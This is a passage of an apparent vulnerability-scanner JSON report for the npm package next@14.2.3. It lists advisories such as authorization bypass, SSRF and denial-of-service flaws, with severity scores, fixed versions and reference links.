"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-51479", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ffe1fe8cd242722c48ed9d1d21d64c4678d5fece8d35a42fb15072938ea11c55", "Title": "next.js: next: authorization bypass in Next.js", "Description": "Next.js is a React framework for building full-stack web applications. In affected versions if a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed for pages directly under the application's root directory. For example: * [Not affected] `https://example.com/` * [Affected] `https://example.com/foo` * [Not affected] `https://example.com/foo/bar`. This issue is patched in Next.js `14.2.15` and later. If your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version. There are no official workarounds for this vulnerability.", "Severity": "HIGH", "CweIDs": [ "CWE-285", "CWE-863" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-51479", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b", "https://github.com/vercel/next.js/releases/tag/v14.2.15", "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f", "https://nvd.nist.gov/vuln/detail/CVE-2024-51479", "https://www.cve.org/CVERecord?id=CVE-2024-51479" ], "PublishedDate": "2024-12-17T19:15:06.697Z", "LastModifiedDate": "2025-09-10T15:48:08.253Z" }, { "VulnerabilityID": "CVE-2026-44573", "VendorIDs": [ "GHSA-36qx-fr4f-26g5" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44573", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:bd9906f4d5b485ab232b2dbc5a0fba6ec53cd6439edf9b78c2790429b6f3bb2d", "Title": "Next.js has a Middleware / Proxy bypass in Pages Router applications using i18n", "Description": "Next.js is a React framework for building full-stack web applications. From 12.2.0 to before 15.5.16 and 16.2.5, Applications using the Pages Router with i18n configured and middleware/proxy-based authorization can allow unauthorized access to protected page data through locale-less /_next/data/\u003cbuildId\u003e/\u003cpage\u003e.json requests. In affected configurations, middleware does not run for the unprefixed data route, allowing an attacker to retrieve SSR JSON for protected pages without passing the intended authorization checks. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-863" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5", "https://nvd.nist.gov/vuln/detail/CVE-2026-44573" ], "PublishedDate": "2026-05-13T17:16:22.627Z", "LastModifiedDate": "2026-05-14T12:24:22.91Z" }, { "VulnerabilityID": "CVE-2026-44578", "VendorIDs": [ "GHSA-c4j6-fc7j-m34r" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-44578", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4b00929401561b3189dd6335cdbb89b9957345f4d80a9420d54dbe8defe083a4", "Title": "Next.js vulnerable to server-side request forgery in applications using WebSocket upgrades", "Description": "Next.js is a React framework for building full-stack web applications. From 13.4.13 to before 15.5.16 and 16.2.5, self-hosted applications using the built-in Node.js server can be vulnerable to server-side request forgery through crafted WebSocket upgrade requests. An attacker can cause the server to proxy requests to arbitrary internal or external destinations, which may expose internal services or cloud metadata endpoints. Vercel-hosted deployments are not affected. This vulnerability is fixed in 15.5.16 and 16.2.5.", "Severity": "HIGH", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "V3Score": 8.6 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/releases/tag/v15.5.16", "https://github.com/vercel/next.js/releases/tag/v16.2.5", "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r", "https://nvd.nist.gov/vuln/detail/CVE-2026-44578" ], "PublishedDate": "2026-05-13T18:16:17.99Z", "LastModifiedDate": "2026-05-14T18:34:38.53Z" }, { "VulnerabilityID": "GHSA-5j59-xgg2-r9c4", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.35, 15.0.7, 15.1.11, 15.2.8, 15.3.8, 15.4.10, 15.5.9, 15.6.0-canary.60, 16.0.10, 16.1.0-canary.19", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-5j59-xgg2-r9c4", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:c465b7761effe6b822ac2a802014aa01002d62640427a73b62a2a571e081fe24", "Title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up", "Description": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4", "https://nextjs.org/blog/security-update-2025-12-11", "https://nvd.nist.gov/vuln/detail/CVE-2025-67779", "https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components", "https://www.cve.org/CVERecord?id=CVE-2025-55184", "https://www.facebook.com/security/advisories/cve-2025-67779" ], "PublishedDate": "2025-12-12T17:21:57Z", "LastModifiedDate": "2026-01-15T21:55:04Z" }, { "VulnerabilityID": "GHSA-8h8q-6873-q5fj", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.16, 16.2.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-8h8q-6873-q5fj", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:92e1aa37bcc2db1c15708088885b76cf9ca9d3d8c1fc2283d064ff5d037c3529", "Title": "Next.js Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23870](https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh). \n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj", "https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-w94c-4vhp-22gx", "https://nvd.nist.gov/vuln/detail/CVE-2026-23870" ], "PublishedDate": "2026-05-11T14:50:27Z", "LastModifiedDate": "2026-05-11T14:50:27Z" }, { "VulnerabilityID": "GHSA-h25m-26qc-wcjf", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.0.8, 15.1.12, 15.2.9, 15.3.9, 15.4.11, 15.5.10, 15.6.0-canary.61, 16.0.11, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-h25m-26qc-wcjf", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:ff28fec564d432dbea049c0723e9e41bc233533a7d1c711b172100b98425733b", "Title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf", "https://nvd.nist.gov/vuln/detail/CVE-2026-23864", "https://vercel.com/changelog/summary-of-cve-2026-23864" ], "PublishedDate": "2026-01-28T15:38:01Z", "LastModifiedDate": "2026-01-28T15:38:01Z" }, { "VulnerabilityID": "GHSA-mwv6-3258-q52c", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.34, 15.0.6, 15.1.10, 15.2.7, 15.3.7, 15.4.9, 15.5.8, 15.6.0-canary.59, 16.0.9, 16.1.0-canary.17", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-mwv6-3258-q52c", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:618188aa35b0d11fb0379e3452fe5b242450d218f40d168c6f6557825e95070a", "Title": "Next Vulnerable to Denial of Service with Server Components", "Description": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c", "https://nextjs.org/blog/security-update-2025-12-11", "https://www.cve.org/CVERecord?id=CVE-2025-55184" ], "PublishedDate": "2025-12-11T22:49:27Z", "LastModifiedDate": "2025-12-11T22:49:28Z" }, { "VulnerabilityID": "GHSA-q4gf-8mx6-v5v3", "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.15, 16.2.3", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-q4gf-8mx6-v5v3", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:da8071eff38bff6de90b2e9abbd23b85c6d34bf93862a462071e7b8a1af9dee8", "Title": "Next.js has a Denial of Service with Server Components", "Description": "A vulnerability affects certain React Server Components packages for versions 19.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23869](https://github.com/facebook/react/security/advisories/GHSA-479c-33wc-g2pg). You can read more about this advisory our [this changelog](https://vercel.com/changelog/summary-of-cve-2026-23869).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage. This can result in denial of service in unpatched environments.", "Severity": "HIGH", "VendorSeverity": { "ghsa": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-q4gf-8mx6-v5v3", "https://vercel.com/changelog/summary-of-cve-2026-23869" ], "PublishedDate": "2026-04-10T15:35:47Z", "LastModifiedDate": "2026-04-10T15:35:47Z" }, { "VulnerabilityID": "CVE-2024-47831", "VendorIDs": [ "GHSA-g77x-44xx-532m" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-47831", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:870deb891342fbe836ab949cbe906351d888b979160e220ba5de55491995cc81", "Title": "next.js: Next.js image optimization has Denial of Service condition", "Description": "Next.js is a React Framework for the Web. Cersions on the 10.x, 11.x, 12.x, 13.x, and 14.x branches before version 14.2.7 contain a vulnerability in the image optimization feature which allows for a potential Denial of Service (DoS) condition which could lead to excessive CPU consumption. Neither the `next.config.js` file that is configured with `images.unoptimized` set to `true` or `images.loader` set to a non-default value nor the Next.js application that is hosted on Vercel are affected. This issue was fully patched in Next.js `14.2.7`. As a workaround, ensure that the `next.config.js` file has either `images.unoptimized`, `images.loader` or `images.loaderFile` assigned.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U", "V3Score": 5.9, "V40Score": 4.6 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-47831", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/d11cbc9ff0b1aaefabcba9afe1e562e0b1fde65a", "https://github.com/vercel/next.js/security/advisories/GHSA-g77x-44xx-532m", "https://nvd.nist.gov/vuln/detail/CVE-2024-47831", "https://www.cve.org/CVERecord?id=CVE-2024-47831" ], "PublishedDate": "2024-10-14T18:15:05.013Z", "LastModifiedDate": "2024-11-08T15:39:21.823Z" }, { "VulnerabilityID": "CVE-2024-56332", "VendorIDs": [ "GHSA-7m27-7ghc-44w9" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "13.5.8, 14.2.21, 15.1.2", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2024-56332", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0901356f7f4fa09450af3a433f9f257bcba669b0b1a39982832d1306434411e5", "Title": "next.js: Next.js Vulnerable to Denial of Service (DoS) with Server Actions", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds.", "Severity": "MEDIUM", "CweIDs": [ "CWE-770" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2024-56332", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/security/advisories/GHSA-7m27-7ghc-44w9", "https://nvd.nist.gov/vuln/detail/CVE-2024-56332", "https://www.cve.org/CVERecord?id=CVE-2024-56332" ], "PublishedDate": "2025-01-03T21:15:13.55Z", "LastModifiedDate": "2025-09-10T15:48:41.83Z" }, { "VulnerabilityID": "CVE-2025-55173", "VendorIDs": [ "GHSA-xv57-4mr9-wg8v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-55173", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4f427324d504eade5234a30344e36974820c0e709bf9b4e93f269dc3d12b445e", "Title": "nextjs: Next.js Content Injection Vulnerability for Image Optimization", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization is vulnerable to content injection. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5.", "Severity": "MEDIUM", "CweIDs": [ "CWE-20" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "V3Score": 4.3 } }, "References": [ "http://vercel.com/changelog/cve-2025-55173", "https://access.redhat.com/security/cve/CVE-2025-55173", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v", "https://nvd.nist.gov/vuln/detail/CVE-2025-55173", "https://vercel.com/changelog/cve-2025-55173", "https://www.cve.org/CVERecord?id=CVE-2025-55173" ], "PublishedDate": "2025-08-29T22:15:31.75Z", "LastModifiedDate": "2025-09-08T16:42:57.183Z" }, { "VulnerabilityID": "CVE-2025-57752", "VendorIDs": [ "GHSA-g5qg-72qw-gw5v" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.31, 15.4.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57752", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:e3be615ed1140070180ac876273edccfb1b377de96b6e4f65e1ad6ef700e860a", "Title": "nextjs: Next.js Affected by Cache Key Confusion for Image Optimization API Routes", "Description": "Next.js is a React framework for building full-stack web applications. In versions before 14.2.31 and from 15.0.0 to before 15.4.5, Next.js Image Optimization API routes are affected by cache key confusion. When images returned from API routes vary based on request headers (such as Cookie or Authorization), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug. This vulnerability has been fixed in Next.js versions 14.2.31 and 15.4.5. All users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.", "Severity": "MEDIUM", "CweIDs": [ "CWE-524" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 }, "redhat": { "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 6.2 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-57752", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd", "https://github.com/vercel/next.js/pull/82114", "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v", "https://nvd.nist.gov/vuln/detail/CVE-2025-57752", "https://vercel.com/changelog/cve-2025-57752", "https://www.cve.org/CVERecord?id=CVE-2025-57752" ], "PublishedDate": "2025-08-29T22:15:31.963Z", "LastModifiedDate": "2025-09-08T16:43:50.33Z" }, { "VulnerabilityID": "CVE-2025-57822", "VendorIDs": [ "GHSA-4342-x723-ch2f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "14.2.32, 15.4.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-57822", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:d25b005e7cf8bac08753ec41dc06257909625a91eeaa10bcc06f3ea028d530e1", "Title": "Next.js Improper Middleware Redirect Handling Leads to SSRF", "Description": "Next.js is a React framework for building full-stack web applications. Prior to versions 14.2.32 and 15.4.7, when next() was used without explicitly passing the request object, it could lead to SSRF in self-hosted applications that incorrectly forwarded user-supplied headers. This vulnerability has been fixed in Next.js versions 14.2.32 and 15.4.7. All users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the next() function.", "Severity": "MEDIUM", "CweIDs": [ "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "V3Score": 8.2 } }, "References": [ "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8", "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f", "https://nvd.nist.gov/vuln/detail/CVE-2025-57822", "https://vercel.com/changelog/cve-2025-57822" ], "PublishedDate": "2025-08-29T22:15:32.143Z", "LastModifiedDate": "2025-09-08T16:41:41.253Z" }, { "VulnerabilityID": "CVE-2025-59471", "VendorIDs": [ "GHSA-9g9p-9gw9-jx7f" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "15.5.10, 16.1.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-59471", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5c1c3f76d7551a0dbaa560bc61f2517af1be6d9676bb5cccc73c04f0dd664b11", "Title": "next: NextJS Denial of Service in Image Optimizer", "Description": "A denial of service vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\r\n\r\nStrongly consider upgrading to 15.5.10 or 16.1.5 to reduce risk and prevent availability issues in Next applications.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-59471", "https://github.com/vercel/next.js", "https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c", "https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec", "https://github.com/vercel/next.js/releases/tag/v15.5.10", "https://github.com/vercel/next.js/releases/tag/v16.1.5", "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f", "https://nvd.nist.gov/vuln/detail/CVE-2025-59471", "https://www.cve.org/CVERecord?id=CVE-2025-59471" ], "PublishedDate": "2026-01-26T22:15:52.89Z", "LastModifiedDate": "2026-02-13T15:03:20.29Z" }, { "VulnerabilityID": "CVE-2026-27980", "VendorIDs": [ "GHSA-3x4c-7xq6-9pq8" ], "PkgID": "next@14.2.3", "PkgName": "next", "PkgIdentifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "494c23d2c970c8b" }, "InstalledVersion": "14.2.3", "FixedVersion": "16.1.7, 15.5.14", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27980", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:5dec13177768ddafe594e0b28117c9687a4df1799c6cf21c3db279c85cdce71f", "Title": "next.js: Next.js: Unbounded next/image disk cache growth can exhaust storage", "Description": "Next.js is a React framework for building full-stack web applications. Starting in version 10.0.0 and prior to version 16.1.7, the default Next.js image optimization disk cache (`/_next/image`) did not have a configurable upper bound, allowing unbounded cache growth. An attacker could generate many unique image-optimization variants and 